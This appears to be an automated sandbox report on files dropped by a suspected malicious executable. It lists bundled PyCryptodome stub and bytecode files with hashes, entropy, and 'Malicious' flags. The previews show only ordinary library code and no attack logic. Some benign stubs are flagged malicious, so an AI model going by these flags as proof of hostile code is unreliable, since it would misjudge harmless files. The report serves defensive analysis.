                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r.`.r.`.r.`.{...p.`.g.a.p.`.9.a.q.`.r.a.Q.`.g.e.y.`.g.d.z.`.g.c.q.`.H.h.s.`.H.`.s.`.H...s.`.H.b.s.`.Richr.`.................PE..d....e.........." ...%............P........................................p............`.........................................`'..t....'..P....P.......@...............`..,...."...............................!..@............ ...............................text...x........................... ..`.rdata....... ......................@..@.data...8....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..,....`.......&..............@..B................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Util\asn1.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3885
                                                                                                                                            Entropy (8bit):4.815634844501543
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:Acab6f+hGLbu31eXTTVkwB60oofRTOB+Jk2:AcjuJYTTVkS6IF6+m2
                                                                                                                                            MD5:1EFE3020CA61E0B1DA7B8680D73F84DA
                                                                                                                                            SHA1:D996C31812286881EB3D6E3FA28715095EC5587F
                                                                                                                                            SHA-256:4DB889724654605FF759C5B7D754174D13F71B3B621792E48AD0F9BE0CFCCC57
                                                                                                                                            SHA-512:12D48E230826E09437536FB35642F434E71D5C219A6B61FAF064B785CD09E131F7595AC7DBE1A359C81B23DC24B3436F6AFDF9CE7EBD6961EBEDAF23F5F81F28
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Optional, Sequence, Union, Set, Iterable....__all__ = ['DerObject', 'DerInteger', 'DerOctetString', 'DerNull',.. 'DerSequence', 'DerObjectId', 'DerBitString', 'DerSetOf']....# TODO: Make the encoded DerObjects their own type, so that DerSequence and..# DerSetOf can check their contents better....class BytesIO_EOF:.. def __init__(self, initial_bytes: bytes) -> None: ..... def set_bookmark(self) -> None: ..... def data_since_bookmark(self) -> bytes: ..... def remaining_data(self) -> int: ..... def read(self, length: int) -> bytes: ..... def read_byte(self) -> bytes: .......class DerObject:.. payload: bytes.. def __init__(self, asn1Id: Optional[int]=None, payload: Optional[bytes]=..., implicit: Optional[int]=None,.. constructed: Optional[bool]=False, explicit: Optional[int]=None) -> None: ..... def encode(self) -> bytes: ..... def decode(self, der_encoded: bytes, strict: bool=...) -> DerObject: .......class DerInte

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Util\number.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):67200
                                                                                                                                            Entropy (8bit):5.287221389845664
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:R9jNqUkXZjyUy0lwXEgNjOtg78YrIn6VhjlLQ5DR4wLDzwK2csHX7:RutpyUy0lsEgZOtg78sI6VTLQ5DRvvze
                                                                                                                                            MD5:ECA9E39BA42E91E16483AA4FA413371B
                                                                                                                                            SHA1:90742AF469908E7B83DD57E79C7CF0943D8A126E
                                                                                                                                            SHA-256:49EA4EF4705CCCA19A512A294D6F49B4B669BB88BFCF7400BA5A25ECD3B1E11C
                                                                                                                                            SHA-512:D934181197581A903E74F57E517E8719FFE2FA398CE81E22EDFDF01294C8F9E10FEC2427FBE52C1703C999A30558D29DE2B5F96A211A507DE45FB14FA4E327C7
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........eh~..............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.Z.d...Z.d...Z.d.d...Z.d.d...Z.d.d...Z.e.j.........d.d.............d.k.....r.e.j.........Z.n.d...Z.e.j.........d.d.............d.k.....r.d...Z.n.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.l.Z.d.d...Z.d...Z.d.d.l.Z.d.d...Z.d...Z.d.Z.d.S.)......N)...Random)...iter_rangec..........................|.d.k.....r.t...........................|.d.k.....s.|.d.k.....r.t...........d.................t...........|.|...............\...}.}.|.d.k.....r.|.d.k.....r.|.d.z...}.|.S.).zDReturn ceil(n/d), that is, the smallest integer r such that r*d >= nr....z.Non positive values.....)...ZeroDivisionError..ValueError..divmod)...n..d..r..qs.... .fC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\Crypto\Util\number.py..ceil_divr....%...si...........A.v.v.....!..!..!....A.....1.q.5.5......../../../....!.Q.<.<.D.A.q....Q.....Q.!.V.V....Q........H.....c.....................T.....|.d.k....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Util\number.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):994
                                                                                                                                            Entropy (8bit):4.898132103946567
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RE0x1JCvE59p+vE59eE59iLdUKhGnE597pcSpShFE59cSpShFE5vUyrfunVshdU:bxX7Z+crYnJescsje
                                                                                                                                            MD5:81227B5A65D7EF13CB0247C9B7225673
                                                                                                                                            SHA1:8954A181B5E8D7B31145E5C139935B9780E4D1EB
                                                                                                                                            SHA-256:6BD67E3A908997245FB373BC1C4971BAC0CFDD5FC17D4B7CDBD3F51AD6774AF1
                                                                                                                                            SHA-512:12F42616F440853BF94758392116879BE87073F515AE0C33454BFAC2D80140DE0FCC0469E34D8E06B42436A3EDEF4B5BE8D0E7C5EFCE413CE0F89041556CCA59
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import List, Optional, Callable......def ceil_div(n: int, d: int) -> int: .....def size (N: int) -> int: .....def getRandomInteger(N: int, randfunc: Optional[Callable]=None) -> int: .....def getRandomRange(a: int, b: int, randfunc: Optional[Callable]=None) -> int: .....def getRandomNBitInteger(N: int, randfunc: Optional[Callable]=None) -> int: .....def GCD(x: int,y: int) -> int: .....def inverse(u: int, v: int) -> int: .....def getPrime(N: int, randfunc: Optional[Callable]=None) -> int: .....def getStrongPrime(N: int, e: Optional[int]=0, false_positive_prob: Optional[float]=1e-6, randfunc: Optional[Callable]=None) -> int: .....def isPrime(N: int, false_positive_prob: Optional[float]=1e-6, randfunc: Optional[Callable]=None) -> bool: .....def long_to_bytes(n: int, blocksize: Optional[int]=0) -> bytes: .....def bytes_to_long(s: bytes) -> int: .....def long2str(n: int, blocksize: Optional[int]=0) -> bytes: .....def str2long(s: bytes) -> int: .......sieve_base: List[int]..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Util\py3compat.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):8014
                                                                                                                                            Entropy (8bit):4.931768215652925
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:EodTTOVYDLOjIWTmpSaRBF7mxzfidDpD6erboFpX8j64rkX202m5PDpAa9DGZ/Ef:EoM+UIW82MvJ0H4rTO5PFJ5G+TyzWWY
                                                                                                                                            MD5:F50A6F0E924A9A3855CF43543ABB8D01
                                                                                                                                            SHA1:29932277B9A4A1E48AE2A83CCE0A72CC4D50560E
                                                                                                                                            SHA-256:0180F289354D7C285F3957AAF7841304C165C4D83ABD6BD68FE03CCF2C49BD5E
                                                                                                                                            SHA-512:D20E77D02D8CD45219374C0A56CDF5753E2CEA312ED9DE1B9294A25103DC5893EAB6E74CD03990464A9FC207A5D9C7CA49A76B434D5939C4762C10854FEE24FE
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........ez.........................V.....d.Z.d.d.l.Z.d.d.l.Z.e.j.........d...........d.k.....rJd...Z.d...Z.d...Z.d...Z.d$d...Z.d...Z.d...Z.d...Z.d.d.l.m.Z...e.Z.d.d.l.m.Z...e.Z.d...Z.d...Z.d...Z...e.j.........d.e.f.d.d.i...............Z.e.Z.n>d...Z.d...Z.d...Z.d...Z.d$d...Z.d...Z.d...Z.d...Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.Z.d...Z.d ..Z.d!..Z.d.d"l.m.Z...e.Z.d#..Z.[.[.d.S.)%a....Compatibility code for handling string/bytes changes from Python 2.x to Py3k..In Python 2.x, strings (of type ''str'') contain binary data, including encoded.Unicode text (e.g. UTF-8). The separate type ''unicode'' holds Unicode text..Unicode literals are specified via the u'...' prefix. Indexing or slicing.either type always produces a string of the same type as the original..Data read from a file is always of '''str'' type...In Python 3.x, strings (type ''str'') may only contain Unicode text. The u'...'.prefix and the ''unicode'' type are now redundant. A new type (called.''bytes'') has to be used

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Util\py3compat.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):870
                                                                                                                                            Entropy (8bit):4.791491758318878
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1REgT3JtgPnrnIW9h3MnBbRFNU+U4Fu31954iEe1oHhASLjPMQ:pZtgMcUTkDTtoBjLt
                                                                                                                                            MD5:E7EC097AA59EF78A17CCA1860BE69741
                                                                                                                                            SHA1:A25E52635BA19E8324128B8900378458BDAA3AF2
                                                                                                                                            SHA-256:A1913976F178C28B8A7C117093233AAC0D3E772C4876DA9C084382BB95F2AC2D
                                                                                                                                            SHA-512:675F6249EF76BDA58D64ABF2BEB84DA58C04A4054F380BC3C2D63CA0D0CAB3342FB36A43925C6176D494F70AC1AEFD06DDB809F28F4A3412E857ACA1F42E6451
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Any, Optional, IO....Buffer = Union[bytes, bytearray, memoryview]....import sys....def b(s: str) -> bytes: .....def bchr(s: int) -> bytes: .....def bord(s: bytes) -> int: .....def tobytes(s: Union[bytes, str]) -> bytes: .....def tostr(b: bytes) -> str: .....def bytestring(x: Any) -> bool: .......def is_native_int(s: Any) -> bool: .....def is_string(x: Any) -> bool: .....def is_bytes(x: Any) -> bool: .......def BytesIO(b: bytes) -> IO[bytes]: .....def StringIO(s: str) -> IO[str]: .......if sys.version_info[0] == 2:.. from sys import maxint.. iter_range = xrange....else:.. from sys import maxsize as maxint.. iter_range = range....class FileNotFoundError:.. def __init__(self, err: int, msg: str, filename: str) -> None:.. pass....def _copy_bytes(start: Optional[int], end: Optional[int], seq: Buffer) -> bytes: .....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Util\strxor.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4841
                                                                                                                                            Entropy (8bit):5.182565008277402
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:BUDdkv/39DpsEJwyJfT/bFlvhuz/Z6L0xNWXwy4o:6i5P7ZFhUu0L+wTo
                                                                                                                                            MD5:440359BB55F14231E7ABBBDC13C179AB
                                                                                                                                            SHA1:2280C0E00898C37E10B2FEEB1040B8EC1ED047A9
                                                                                                                                            SHA-256:63060352F7316445AC7C3FBF9E81B2F2E9FEFB853DB33FD9B9E41A0281F7D866
                                                                                                                                            SHA-512:4906E70547A3D449AED5EA7EE5D724B987C043036A9D05D25A38974AC5CB6C1BB3D2F92D8B8AD7F8E3ED51879C2450A0C1CADD34E116AB9CA885D4A24583368B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e..........................T.....d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d.d...............Z.d.d...Z.d.d...Z.d...Z.d.S.)......)...load_pycryptodome_raw_lib..c_size_t..create_string_buffer..get_raw_buffer..c_uint8_ptr..is_writeable_bufferz.Crypto.Util._strxoray.... void strxor(const uint8_t *in1,. const uint8_t *in2,. uint8_t *out, size_t len);. void strxor_c(const uint8_t *in,. uint8_t c,. uint8_t *out,. size_t len);. Nc.....................>.....t...........|...............t...........|...............k.....r.t...........d.................|...t...........t...........|.............................}.n_|.}.t...........|...............s.t...........d.................t...........|...............t...........|...............k.....r.t...........d.t...........|.............

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Util\strxor.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):249
                                                                                                                                            Entropy (8bit):4.800678842548869
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:1REYBXyUzrIY3MTDyQdQAY0OXW6ah05gUQdByKj0ah05gv:1REYB3vIY3YyQnrOXAh05VQ6KZh05q
                                                                                                                                            MD5:81C7899ED070F1D26338977374A4B853
                                                                                                                                            SHA1:2627B47DA19BB2F2B8E7D25A5A57473C00C86550
                                                                                                                                            SHA-256:CA7D073C74998CFFB501A2E6E1C99AF62F49272A5FDFB3527769E2A632DFE1A0
                                                                                                                                            SHA-512:CF5299A774C61A0F84D6E1E4233F426CC9D854D809EEF0D6B1158EC0078E75C54C3141E835DC3D0F376B53EFB8DDE462B49B0A5093C63613B332617966F34D0C
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....def strxor(term1: bytes, term2: bytes, output: Optional[Buffer]=...) -> bytes: .....def strxor_c(term: bytes, c: int, output: Optional[Buffer]=...) -> bytes: .....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\__init__.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):208
                                                                                                                                            Entropy (8bit):4.7386324675372125
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:F//aNH4eH8u95/n23d6p9ArMDUIaatqtVnkPtkml:R/aRbH8g/2IphtaatqtqPWS
                                                                                                                                            MD5:CA93D6F66177D6E84FBA147B4CA98DF9
                                                                                                                                            SHA1:767E47159CE6EEE44BD220E329BFD013323B574B
                                                                                                                                            SHA-256:D12A9843A6FF7F9B4833EC67C95208052E2973583526844BB101B63442A1EF64
                                                                                                                                            SHA-512:602408DF9AAC942F368B280D20A389DECE85EC4BF87CEC8926AA84D26523095D28B112353E823B027418538812721AB3B779F59CB16E494EFB15C558629CCFED
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..........xg................................d.S.).N..r..........cC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\Crypto\__init__.py..<module>r........s...................r....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\__init__.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):103
                                                                                                                                            Entropy (8bit):4.320003818965119
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:1REvgBk8J0fWQLCfcJAOLRL+2MliHovcoFQy:1REYBb0fWpcFY2MtJN
                                                                                                                                            MD5:BF77DB2C18C7E4E3E80EA7D09C2D8336
                                                                                                                                            SHA1:682ADC1869A615EBC5152E303D7F10C9DF4800C1
                                                                                                                                            SHA-256:748D33339311187C619DF8EAA40C8F1A8B4A4EB3E59DE4CDD90FA30105CD8351
                                                                                                                                            SHA-512:ADD512240AB6D99FF0B4871C7F96849267CCB8CD5BE8BAB86579D5599434266F1C4C290DF395526C694110BDD67DCDA6970CEF39416AB87798AC78914AD87EB7
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Tuple, Union....version_info : Tuple[int, int, Union[int, str]]..__version__ : str..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\AES.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):8726
                                                                                                                                            Entropy (8bit):5.534630062231483
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:he65nM89EXr/NjsHXk/y+ItPdZ9QjLslFdgggy/o:h/9GVhGtPFQjLslFTo
                                                                                                                                            MD5:70445883CD770492F07604AD054703D4
                                                                                                                                            SHA1:6F190E13E703A64F54D1FCE7DCF72F4A77B74C29
                                                                                                                                            SHA-256:0B518E1BB4EB3DA21ADDC8E7FDBAC762059508B947E63C2302C4E21F7EF962A3
                                                                                                                                            SHA-512:66ABEA2D11DB3678055550FB73D4AD32539038D540E25F45E1EDBBFAF2040FBDF04440BCF932A04FFF93CA83E4E7752831C9641A12E9C75F24781287DB615BD1
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e.#........................,.....d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z...e.d.e...............Z...d.Z...e.j.......................r ..e.d.e.......................d.d.............................Z.n.#.e.$.r...Y.n.w.x.Y.w.d...Z.d...Z.d...Z d.Z!d.Z"d.S.)......N)..._create_cipher)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..c_size_t..c_uint8_ptr)..._cpu_features)...get_random_bytes.......................................................a..... int AES_start_operation(const uint8_t key[],. size_t key_len,. void **pResult);. int AES_encrypt(const void *state,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int AES_decrypt(const void *state,. const uint8_t *in,. uint8_t *out,.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\AES.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3819
                                                                                                                                            Entropy (8bit):4.806572670333257
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:5FYAgGWG6WcWUjmKokLSL0jcj9yYFtpZuObl9gbiYbwJbzk:58ZoUW0jcj9yYFtpZuObfgbiYbwJbzk
                                                                                                                                            MD5:39C62D7749149CEFCA56CD8924566FCE
                                                                                                                                            SHA1:354C63D5279D521E27C6AE448E3161812B5FD46E
                                                                                                                                            SHA-256:880C7604F5F9CBEAEE58E411F15880F0908F1A276F1E0B7817A6F9ECE8513FDB
                                                                                                                                            SHA-512:009CC6DEC9ACA8000038449669B6023935010F0D8B365018516A4BD870C51073591E9E3B0A91DD251F9196865BA946D4B08E6F65AB4CAC8097E2B0AD8329DA80
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Dict, Optional, Tuple, Union, overload..from typing_extensions import Literal....Buffer=bytes|bytearray|memoryview....from Cryptodome.Cipher._mode_ecb import EcbMode..from Cryptodome.Cipher._mode_cbc import CbcMode..from Cryptodome.Cipher._mode_cfb import CfbMode..from Cryptodome.Cipher._mode_ofb import OfbMode..from Cryptodome.Cipher._mode_ctr import CtrMode..from Cryptodome.Cipher._mode_openpgp import OpenPgpMode..from Cryptodome.Cipher._mode_ccm import CcmMode..from Cryptodome.Cipher._mode_eax import EaxMode..from Cryptodome.Cipher._mode_gcm import GcmMode..from Cryptodome.Cipher._mode_siv import SivMode..from Cryptodome.Cipher._mode_ocb import OcbMode....MODE_ECB: Literal[1]..MODE_CBC: Literal[2]..MODE_CFB: Literal[3]..MODE_OFB: Literal[5]..MODE_CTR: Literal[6]..MODE_OPENPGP: Literal[7]..MODE_CCM: Literal[8]..MODE_EAX: Literal[9]..MODE_SIV: Literal[10]..MODE_GCM: Literal[11]..MODE_OCB: Literal[12]....# MODE_ECB..@overload..def new(key: Buffer,.. mode: Lite

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\ARC2.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1048
                                                                                                                                            Entropy (8bit):4.936743654874026
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RENAAI1QJSzJSVJuJSpJQlJdvpB+yE2x/NEo0EDNqDNMN3zb1DoeRHYO:K+1AgGWG6xx9GIJqJejbFoeR4O
                                                                                                                                            MD5:ABC0C75BDCA256568739E75069C630CF
                                                                                                                                            SHA1:997D0DF67289A92CE181B9906C27EEBC96614021
                                                                                                                                            SHA-256:C724C1EB1442CAEEE70643125D96DE0A7793A2E8470775E5D1E7628FCA67AF82
                                                                                                                                            SHA-512:0E2729C803A2143AC70A26FD2D69067E8DA974BA56140326C71DAA3DF87286BB2E30C1C9A35BA4BACDDE7BFA34339F3B6EBD03150376A799CC9FC47FDCD79E6D
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Dict, Iterable, Optional....Buffer = bytes|bytearray|memoryview....from Cryptodome.Cipher._mode_ecb import EcbMode..from Cryptodome.Cipher._mode_cbc import CbcMode..from Cryptodome.Cipher._mode_cfb import CfbMode..from Cryptodome.Cipher._mode_ofb import OfbMode..from Cryptodome.Cipher._mode_ctr import CtrMode..from Cryptodome.Cipher._mode_openpgp import OpenPgpMode..from Cryptodome.Cipher._mode_eax import EaxMode....ARC2Mode = int....MODE_ECB: ARC2Mode..MODE_CBC: ARC2Mode..MODE_CFB: ARC2Mode..MODE_OFB: ARC2Mode..MODE_CTR: ARC2Mode..MODE_OPENPGP: ARC2Mode..MODE_EAX: ARC2Mode....def new(key: Buffer,.. mode: ARC2Mode,.. iv : Optional[Buffer] = ...,.. IV : Optional[Buffer] = ...,.. nonce : Optional[Buffer] = ...,.. segment_size : int = ...,.. mac_len : int = ...,.. initial_value : Union[int, Buffer] = ...,.. counter : Dict = ...) -> \.. Union[EcbMode, CbcMode, CfbMode, OfbMode, CtrMode, OpenPgpMode]: .

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\ARC4.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):438
                                                                                                                                            Entropy (8bit):4.892911336139007
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYBdHgMJjWrMRyDWeXRyc1APyMFq6R5wnZ0R5AomWL7Ry/O:1REUAIWrQFeBFAfnRe+RGorVYO
                                                                                                                                            MD5:F00CD9D3130AA368D5F1F10B93E0A612
                                                                                                                                            SHA1:E9C27B3918320183E7366BD1D1294B48EAC93378
                                                                                                                                            SHA-256:28855BC2FF6531EFD40C42075EB5E506AD8A5F8D98B8041FB218725C7C484054
                                                                                                                                            SHA-512:228840E70CD9FAD2CB8EA202BD45931614A9E26C619ECDBC017E832B3588C85B0BBA97B762A804DB16BE3D19481B1CC17AB616FE66D46FD66DCB38B132D2994A
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Any, Union, Iterable....Buffer = bytes|bytearray|memoryview....class ARC4Cipher:.. block_size: int.. key_size: int.... def __init__(self, key: Buffer, *args: Any, **kwargs: Any) -> None: ..... def encrypt(self, plaintext: Buffer) -> bytes: ..... def decrypt(self, ciphertext: Buffer) -> bytes: .......def new(key: Buffer, drop : int = ...) -> ARC4Cipher: .......block_size: int..key_size: Iterable[int]..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\Blowfish.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1084
                                                                                                                                            Entropy (8bit):4.920066075942964
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RENAAI1QJSzJSVJuJSpJQlJRvEStrF+olDNqDNMN3zb1DoeRHYO:K+1AgGWG6ltrF+wJqJejbFoeR4O
                                                                                                                                            MD5:D0AED6A00929EE2C6DA6B409C012F5E2
                                                                                                                                            SHA1:375CD151B552CA99011FF97581DD04BD33517FED
                                                                                                                                            SHA-256:A363EF5A112333F407470A884E23357F1C251FE733091B95DC8E86AE3FF73A6D
                                                                                                                                            SHA-512:147F1DE6BE32E1FCB88FFB0D37B765F5303CF2E7586CD405283FABD97A4D6714F011FDEE4A87B4777253BA41EC50C2A19D9DDACBB61C77E501D34D9999D55D08
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Dict, Iterable, Optional....Buffer = bytes|bytearray|memoryview....from Cryptodome.Cipher._mode_ecb import EcbMode..from Cryptodome.Cipher._mode_cbc import CbcMode..from Cryptodome.Cipher._mode_cfb import CfbMode..from Cryptodome.Cipher._mode_ofb import OfbMode..from Cryptodome.Cipher._mode_ctr import CtrMode..from Cryptodome.Cipher._mode_openpgp import OpenPgpMode..from Cryptodome.Cipher._mode_eax import EaxMode....BlowfishMode = int....MODE_ECB: BlowfishMode..MODE_CBC: BlowfishMode..MODE_CFB: BlowfishMode..MODE_OFB: BlowfishMode..MODE_CTR: BlowfishMode..MODE_OPENPGP: BlowfishMode..MODE_EAX: BlowfishMode....def new(key: Buffer,.. mode: BlowfishMode,.. iv : Optional[Buffer] = ...,.. IV : Optional[Buffer] = ...,.. nonce : Optional[Buffer] = ...,.. segment_size : int = ...,.. mac_len : int = ...,.. initial_value : Union[int, Buffer] = ...,.. counter : Dict = ...) -> \.. Union[EcbMode, CbcMode, CfbMod

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\CAST.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1049
                                                                                                                                            Entropy (8bit):4.934689035797648
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RENAAI1QJSzJSVJuJSpJQlJFivieL/tixsDOIosswDNqDNMN3zb1DoeRHYg3:K+1AgGWG6FQieL/tixsDOIYwJqJejbFF
                                                                                                                                            MD5:BD0C5452D0C862F46720CDFB944FA7BC
                                                                                                                                            SHA1:917D4020DBD2D124BAA89750FE347739BBF11D1B
                                                                                                                                            SHA-256:1469D7505976C0A27F8B23F64E402BE8A897B00898539B5BB6803792178DFE1D
                                                                                                                                            SHA-512:3143965EDF0205A84B28C34BA7F0EF005440D0F3EE431C06BC70E5FD09CEA0F0C2FF3C4C6E238D4628DB0AB1BE206DB60A4C76AD48B26B2FB3BEDDE2B1B81CCD
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Dict, Iterable, Optional....Buffer = bytes|bytearray|memoryview....from Cryptodome.Cipher._mode_ecb import EcbMode..from Cryptodome.Cipher._mode_cbc import CbcMode..from Cryptodome.Cipher._mode_cfb import CfbMode..from Cryptodome.Cipher._mode_ofb import OfbMode..from Cryptodome.Cipher._mode_ctr import CtrMode..from Cryptodome.Cipher._mode_openpgp import OpenPgpMode..from Cryptodome.Cipher._mode_eax import EaxMode....CASTMode = int....MODE_ECB: CASTMode..MODE_CBC: CASTMode..MODE_CFB: CASTMode..MODE_OFB: CASTMode..MODE_CTR: CASTMode..MODE_OPENPGP: CASTMode..MODE_EAX: CASTMode....def new(key: Buffer,.. mode: CASTMode,.. iv : Optional[Buffer] = ...,.. IV : Optional[Buffer] = ...,.. nonce : Optional[Buffer] = ...,.. segment_size : int = ...,.. mac_len : int = ...,.. initial_value : Union[int, Buffer] = ...,.. counter : Dict = ...) -> \.. Union[EcbMode, CbcMode, CfbMode, OfbMode, CtrMode, OpenPgpMode]: .

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\ChaCha20.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):798
                                                                                                                                            Entropy (8bit):4.852768717173627
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RE2AIM/sxQUADnRNne3yFnR3Fne3xodgxVYBy:3Me/4vesLehx+w
                                                                                                                                            MD5:7311A085F06CFB4AF892363A4CB21E0E
